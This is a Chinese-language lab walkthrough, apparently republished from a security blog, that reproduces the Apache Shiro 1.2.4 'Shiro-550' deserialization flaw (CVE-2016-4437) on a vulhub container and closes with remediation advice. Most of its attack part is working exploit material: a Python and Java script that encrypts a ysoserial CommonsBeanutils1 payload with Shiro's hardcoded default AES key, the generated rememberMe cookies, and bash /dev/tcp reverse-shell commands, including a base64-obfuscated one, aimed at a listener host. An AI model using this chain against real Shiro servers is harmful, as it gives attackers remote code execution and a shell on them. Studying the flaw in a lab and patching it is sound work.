Apache Shiro 1.2.4 反序列化漏洞Shiro-550(CVE-2016-4437)解析与防护措施
原文地址: https://88box.top 生成时间: 2026-05-21 01:02:21
Apache Shiro 1.2.4 反序列化漏洞Shiro-550(CVE-2016-4437) - hey99 知识搜索引擎
精选文章
Apache Shiro 1.2.4 反序列化漏洞Shiro-550(CVE-2016-4437)
1、Apache ShiroApache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。2、影响范围Apache Shiro ≤ 1.2.4(所有版本)包括:1.2.4、1.2.3、1.2.2、1.2.1、1.2.0、1.1.x、1.0.x 等修复版本:1.2.5 及以上(含 1.3.x、1.4.x、1.5.x、1.6.x、1.7.x、1.8.x、2.x)3、漏洞原理
更新于 2026-05-20 16:38
Apache Shiro 1.2.4 反序列化漏洞Shiro-550(CVE-2016-4437)
一、漏洞简介
1、Apache Shiro
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
2、影响范围
Apache Shiro ≤ 1.2.4(所有版本)
包括:1.2.4、1.2.3、1.2.2、1.2.1、1.2.0、1.1.x、1.0.x 等
修复版本:1.2.5 及以上(含 1.3.x、1.4.x、1.5.x、1.6.x、1.7.x、1.8.x、2.x)
3、漏洞原理
Shiro 1.2.4 及以下版本,记住我功能使用固定硬编码 AES 密钥,且对 Cookie 里的 rememberMe 数据直接解密反序列化无校验;攻击者利用默认密钥构造恶意序列化载荷,即可远程代码执行。
二、环境准备
1、搭建靶机
进入目录
[
root@localhost vulhub
]
cd shiro
查看目录
[
root@localhost shiro
]
ls
CVE-2010-3863 CVE-2016-4437 CVE-2020-1957
进入目录
[
root@localhost shiro
]
cd CVE-2016-4437/
搭建环境
[
root@localhost CVE-2016-4437
]
docker compose up -d
查看容器
[
root@localhost CVE-2016-4437
]
docker ps
2、下载ysoserial
通过代理下载ysoserial
┌──
(
root㉿kali
)
-
[
~
]
└─
proxychains wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar -O ysoserial-all.jar
查看
┌──
(
root㉿kali
)
-
[
~
]
└─
ls
Desktop Documents Downloads EHole Music Pictures Public Templates Videos ysoserial-0.0.6-all.jar
测试是否能正常使用
┌──
(
root㉿kali
)
-
[
~
]
└─
java -jar ysoserial-all.jar
找了半天下载地址
3、ACE加密脚本
python版本
import
base64
from
Crypto
.
Cipher
import
AES
读取生成的 poc.bin
with
open
(
"poc.bin"
,
"rb"
)
as
f
:
payload
=
f
.
read
(
)
Shiro 默认密钥
key
=
base64
.
b64decode
(
"kPH+bIxk5D2deZiIxcaaaA=="
)
生成随机IV
iv
=
AES
.
new
(
key
,
AES
.
MODE_CBC
)
.
iv
PKCS7 填充
def
pad
(
s
)
:
bs
=
AES
.
block_size
return
s
+
(
bs
-
len
(
s
)
%
bs
)
*
bytes
(
[
bs
-
len
(
s
)
%
bs
]
)
加密
payload
=
pad
(
payload
)
encrypted
=
AES
.
new
(
key
,
AES
.
MODE_CBC
,
iv
)
.
encrypt
(
payload
)
输出最终 rememberMe
result
=
base64
.
b64encode
(
iv
+
encrypted
)
.
decode
(
)
(
"rememberMe="
+
result
)
JAVA版本
package org.vulhub.shirodemo;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.codec.CodecSupport;
import org.apache.shiro.util.ByteSource;
import org.apache.shiro.codec.Base64;
import org.apache.shiro.io.DefaultSerializer;
import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Paths;
public class TestRemember {
public static void main(String[] args) throws Exception {
byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("/path", "to", "poc.ser"));
AesCipherService aes = new AesCipherService();
byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));
ByteSource ciphertext = aes.encrypt(payloads, key);
System.out.printf(ciphertext.toString());
}
}
4、生成POC
这里说一下,因为kali的JDK是21版本的,而需要JDK8才能兼容ysoserial,如果你没有使用JDK8去运行就会出现我下面的问题
生成POC
┌──
(
root㉿kali
)
-
[
~
]
└─
java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/success" > poc.bin
在kali源里下载JDK8(源里没有所以只能去官方下载了)
┌──
(
root㉿kali
)
-
[
~
]
└─
apt install openjdk-8-jdk
用 Adoptium 官方 API 直链
┌──
(
root㉿kali
)
-
[
~
]
└─
# proxychains wget -O jdk8.tar.gz \
"https://api.adoptium.net/v3/binary/latest/8/ga/linux/x64/jdk/hotspot/normal/eclipse"
解压
┌──
(
root㉿kali
)
-
[
~
]
└─
tar -xvf jdk8.tar.gz
转移
┌──
(
root㉿kali
)
-
[
~
]
└─
mv jdk8u492-b09 /opt/jdk8
加别名
┌──
(
root㉿kali
)
-
[
~
]
└─
alias java8='/opt/jdk8/bin/java'
POC生成
┌──
(
root㉿kali
)
-
[
~
]
└─
java8 -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/success" > poc.bin
三、漏洞复现
1、访问主页
2、生成rememberMe
生成rememberMe
┌──(root㉿kali)-[~]
└─# python shiro_exp.py
安装pycryptodome库
┌──(root㉿kali)-[~]
└─# pip3 install pycryptodome
新版 Kali 的系统保护机制,不让直接装 pip 包,所以要使用参数来下载
┌──(root㉿kali)-[~]
└─# pip3 install pycryptodome --break-system-packages
┌──
(
root㉿kali
)
-
[
~
]
└─
python shiro_exp.py
rememberMe
=
pMGTjHZGLSsDWt9khKqqezr7ufvjGa8Ux7YS5DPmvHEITeNG9bOVtQVY8U8RhxjrLaPU03JWMKC4NGGJZwoC1o25IwOZTo5RkPisUOQVbRLIwh/Vc2FcZ7nmSuzVIKo9ti4iZvzCUXS9gsD6JpO6Q4pVi99POAuXhzjZ4xpXQlMPsqdOBa9oabfGPxLuNyWeJ61jSxAdp23B2LyR608oU371AGochuLM6kmoJIWxelKQqTAqET5i4O9q7STxSBUB0KKg7T2P5dceNbikN0U5e7bbP0R7XAaQwRMvqV9S+FaEWMuoOmzbIYInht+irRuycsCo2JxpHXnLDO5MVQkiMjn1etMYcyu4iOvAk8a0q5SK92zQW+hgmAhlzSjNcq1J+JfdH++R31PaRHCQC7B3QdUmpKQSbcUcOBbiaS4Tk049DjJ8fn+5D/Q+wBkkLWnRFP1dO3Ax+DSZVDbjZ1CDM0jHtMPyMxcnQ1k8kUZkMKP9g+pmDvDgQAFUds1VjF3cjSEmBmwtk98j0RwG3QQnsREb3FLGXROUJasfuiAyvC+2dizOXkAvU9eLpAwd9EsTflv/p5U4X+Mj7/tz51C6J9HatMrDyLj16R7ls58pHMq6d3RsUQFfrYdfp4GJWiB9Vwx2sbLNyw1RSdHjJS5/YXymt7CHe11n26r8eiVQcDWvNLjaboKQnYOkIbuvYYvFH9c1LO5BnDefRZBFku385kwAgZ3JwT16NYAYwUb5vZyRxk8JJ6/vsHBPBIRJgdgD32ehIm3fQ0i+2YLnWnj61BryoKKP/RO8rPiYVLRBb9MYT5Ftx1eCUhLogysqN2HOMvqOIULah0/umy9WNA/jTodCaN96ma55y9QN+j8LAAOCZ9r/G2sbpE/s7wrDanZby1AyrAiyzAFXWVFODoQhI654SXQFATsqRokC3mOdJic45sLuQGnyt7vrsXLTFkglvpPsjceSKZZ/khkiok1BgR+/erebLKT8ZhpzD/qq/lyRdturlYkdT+8tAg+k8BLhVA7hlMTzTLO9JKt8dEhH3Of3sc62pjNiVhzA61HXkVNulhArRECVMnsAaQLajIK71J3edcWJzMgsgCwLhr2E/iaIWhSiPBa4u8wRSTSa4nU9w7TuXrAzKHc3VVxG/P3lVFWYhi+frGeZhRK0GMKhPIe7CGLECg6LpV95xKccKlgBjKDGHrV4UJzPqrRPE0ESsKe8VeR/Meuyi0MjZLWUcJUqgqsbaishMmgMM5s5U9vinBW/cBy3AL6euGuwNxc6NrgKVjK2WNWruieROkTEJEJATbUWTIQ1laY1xow9mZEeRWbaSGGF7Cq+lfVzy4vCAhP6zJ8YfI77X/0iuyUFlGMzACXWAvY/F6JnPkQA/klKOpG4WhGlbLn6Yv75/JpzkT4mivqqyJyHxCRT6BWuOMSe6RFYAsVQssbK2ELns/+mtDaFI0x2UHrNenaMwSITbEu1wb8SskYVbtrjYmZwc4SO12Q/sZvI5l7m3+SVEGVMsVizSDyZD3NlHs+r/1jsCw/D4B4eN6ciS4n94dCQuf0KudlEHHQ08z+cz1ozvxiWgmuYbkWbIDzbZ/4tKKEF4QAmjLCDYklWWLEOa7vsOsjx+hTWboSQxyL7/wiTVTLVwWPO9zNjLmx7IZWyUzACDGxRKwl1yqO5jx8VOyc+OQmeMo6RgA2gAyDCAQm8+Hn+s4js8enpRPs6JXh0qAiaSt5VuSqK4JXUdjYdFvrel/Vj5McHfcd00z3ObshgYn9z1EzYMhfu7fyPvMXoj05NCgIjiZz3fhuek8qAbuzO4KeCOWd4Ffrvfv4beQihrpeNIZJQS7OV1O5b3Ukd2a3McclYIexdWGw3tnUw3Ht/9NlLOAif3kKnvEFgL+Tspi4Yu4nhE5gTCxDgqkfJcT+xJ0+Eig8PSuoeI3I+YsnQ9A+bIEW4m2xG9JSHM4qz59V58sDqPGU7hO8Bjk1DnESmlu4iSsWOJijmSFm9ZgADVBygfSdeZ2oL+E/DjR2OjadzHyh3saBEIIFo5gSAqPbVVvJsei/S8fDwqbqbhcKEAjJEYjhC8MCG/vCXadnASDzwKPR4cM8YvpARw3/43A2bpvRHMNcEFtoEs62lRES7SsqlNP7juMqDbfdCcTeOnA+AnYkVbIi1oPHizH3z4GpROzAheUjjGKn4LQxEjMDRvmh7dAlt0wyPZrdzFpgFM4ykWrYLUAEV+L1eAOGaNS9qriFyPGrE8o6YzYGzHxxTmKAOdsWzOlQA5kn5cayrDebiacUDhsJsRUeXUgchC1uNiR5Jjd3PR455z9my2WuNr7+c7G8Ug4oAJT8JKJsF8ikpW0zu4x0b9ysPOYq+6/OCEPzKi0wTtJ04xEbsQPo8p+LRR7zWSiJh6to7fbE6r/yNRWCQ/xuJtL/UBiIGgq8FJ2u/mfAxePdn80Pfm46C+35HrQdOGHo3udyVwYa2aIStg7Ke+zyXj2MiGp3pvfSZ3E29XDoKCZqMKPiS5httUAW6t8osGlLn9zZu5MPfLeVPksqqrAx+2W8lyHwcd0EpIvYRjGV3B5a0DGzf6IRSsatOh3AkSopJXLRFNeZHU6SVpYQL6okVrm7oAQm1Q+qLc4fYuyQoPY4/wRxjY+SRvqHs/gKOZQoy1MowOZd6zzWMCdsFUEH3fVk7F7CP/ulkVU4xYMVimP7V0lNW+qhydG/k1GuEV7L2hlxhqJh3pREl4lWlytRx26CUc82/QaEBxp9iYDht5IFQr3DnKXcVsfMsefiEtMn4p2xk4Pk/uF7WLd3rHIeKkCX6le3hT7R6eV3JbcGy3ihAJtaXWWQgqzslTcJPCsoU4wD9299crhBdIuUgvghDsH+0fjKpPq8j/3ol4GEOJcn06b5xMz3oFS9q3c/zjBawCO7rN4Sb0yNoKlkXTmxGoLGCXPrC8zJOfx2bhw0K6fNKO9Q8+yH2ADHin6jItnq4ECtdmp5tNGGCQQvXRwRvrbEdpK4YwGiI2Z7Ns7+TnPyLm/L1vHKboxw42Gq/bM+6EVQtQ+SPOnFHawVwHjdBfvDKZFg6wrvqrCHwduXF882HoqQvnDziuI4dMrjB1viil83AZJ1EzsK2VRP45A/C6NYuniZMtN/GaYeh5n3uhKC+47M8bYCCqWVCu9dGKoC0snnQtWjxrM8zr3P4RHWTpbjo0fkeB9o/EXuRq08fRBJj3yWqA3eyvG5tnRmQnaOHYJ3cI3TlW3a1I9FSlMJt/pz8Gg9agC3H1aWEU1+5togZ4FJeL8pGPiyfFBzkFBcPHFf5CUagGtkaRmwPEvgbtHsaczYn2Oz6+mBz8vdcDopgz4fO6SefFugq2R/WsGkFTA6tMRIUyr3O7MIJ1jIL2/L0QyTUyi23XMbKO7kUSiBgICwnR33YCFEIgcAFzQ/lB3SxOTflN7ckXuzIBATKn7HcBkby4O5KasVGeUxAoEjdNsvjFd981F2MQHPPcB8/uGCx6W3/po2cCzY+xnkHRksB0TQodsiMOE81KBTEz2K6Lhfv3MrEDU1ut+NC6TfOrU+qyXeYONOi97mfa1dxVQT84zkr0En9boZsnwRVEId4Yv16V0Ri0vZHcfIuPGHlXqrsf+VlS+g6Y6xdTQSqD+d2Cy1Jc6YKruGV3l3/EnstMCtyC7mFtjTAvs99IWDpJHZG526h0hW2CpKQBG2ZWnTEKk62ZaUBt4p3qGn0BEkscc4x/TzDMA
==
3、发包攻击
先去容器里面看一下是否有success文件
查看容器
[
root@localhost ~
]
docker ps
查看容器tmp目录
[
root@localhost ~
]
docker exec 02fbc4cedb3d ls -la /tmp
再次查看tmp目录,发现已经创建了文件,攻击成功
4、反弹shell
tcp的反弹shell案例
bash
-i
&
/dev/tcp/172.18.3.12/8888
0
&1
/bin/bash
-i
/dev/tcp/172.18.3.12/8888
0
<&
2
&1
bash
-c
{
echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMy4xMi84ODg4IDA+JjE
=
}
|
{
base64,-d
}
|
{
bash,-i
}
生成反弹shell
┌──
(
root㉿kali
)
-
[
~
]
└─
java8 -jar ysoserial-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMy4xMi84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" > shell.ser
替换py脚本中的字符串
┌──
(
root㉿kali
)
-
[
~
]
└─
sed -i 's/poc.bin/shell.ser/g' shiro_exp.py
生成rememberMe
┌──
(
root㉿kali
)
-
[
~
]
└─
python shiro_exp.py
rememberMe
=
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
监听kali端口8888,并且发包查看是否控制
┌──
(
root㉿kali
)
-
[
~
]
└─
nc -lvnp 8888
listening on
[
any
]
8888
..
.
四、其他方式复现
1、shiro反序列化
在攻击主机打开shiro反序列化利用工具,选择漏洞类型为
shiro550
,地址栏中填入对应的地址,http://192.168.88.130(这里我重新搭建的环境这是IP地址不一样,环境其他的都一样)
2、DNS外带漏洞检测
CEYE
是一个用于检测带外数据(Out-of-Band)的监控平台,例如
DNS
查询和HTTP请求。它可以帮助安全研究人员在测试漏洞时收集信息,例如
SSRF/ XXE/ RCE
等(这里如果
dnslog
没有检测出来换成
ceye
来检测,两个都不太稳定)
3、利用链成功
4、反弹Shell
监听8000端口
[
root@CentOS7 ~
]
nc -lvp 8000
查看权限
root@1d7284f53b38:/
id
查看IP
root@1d7284f53b38:/
ip add
到这里就已经攻击成功了,补充说明一下,Shiro 密钥可能是默认的也可能是其他的,所以和爆破差不多的原理,可以专门去收集或者或者下载密钥,也不只是只有这一个工具使用,比如kali上就可以安装:ShiroAttack2、shiro-exploit等,你也可以自己写python脚本
五、修复建议
1、漏洞成因
Shiro 默认硬编码 AES 密钥
kPH+bIxk5D2deZiIxcaaaA==
公开泄露;
采用 CBC 模式 存在反序列化漏洞;
攻击者可构造恶意
rememberMe
Cookie,触发反序列化 RCE。
2、主要修复
禁止使用默认密钥,重新生成高强度随机 Base64 密钥,配置到
shiro.ini
/yml 中
升级到:1.2.7 及以上(推荐 1.3.x/ 2.x 稳定版)
业务不需要就直接关闭
rememberMe
,从根源杜绝漏洞利用。
3、运维防护
WAF 加规则:拦截
rememberMe
超长恶意 Cookie、特征 payload
定期扫描资产,检测是否存在 Shiro 指纹 + 默认密钥
服务器最小权限运行,降低 RCE 后的危害范围
限制外网访问后台管理接口
六、参考文献
Shiro反序列化漏洞详细分析:https://www.anquanke.com/post/id/228889
Shiro反序列化分析带思路及组件检测笔记:https://xz.aliyun.com/t/8997
Shiro介绍及主要流程:https://www.cnblogs.com/insaneXs/p/10999384.html
https://github.com/vulhub/vulhub/blob/master/shiro/CVE-2016-4437/README.zh-cn.md
查看原文
🏷 标签: Apache Shiro, 反序列化漏洞, CVE-2016-4437, Shiro-550, Java安全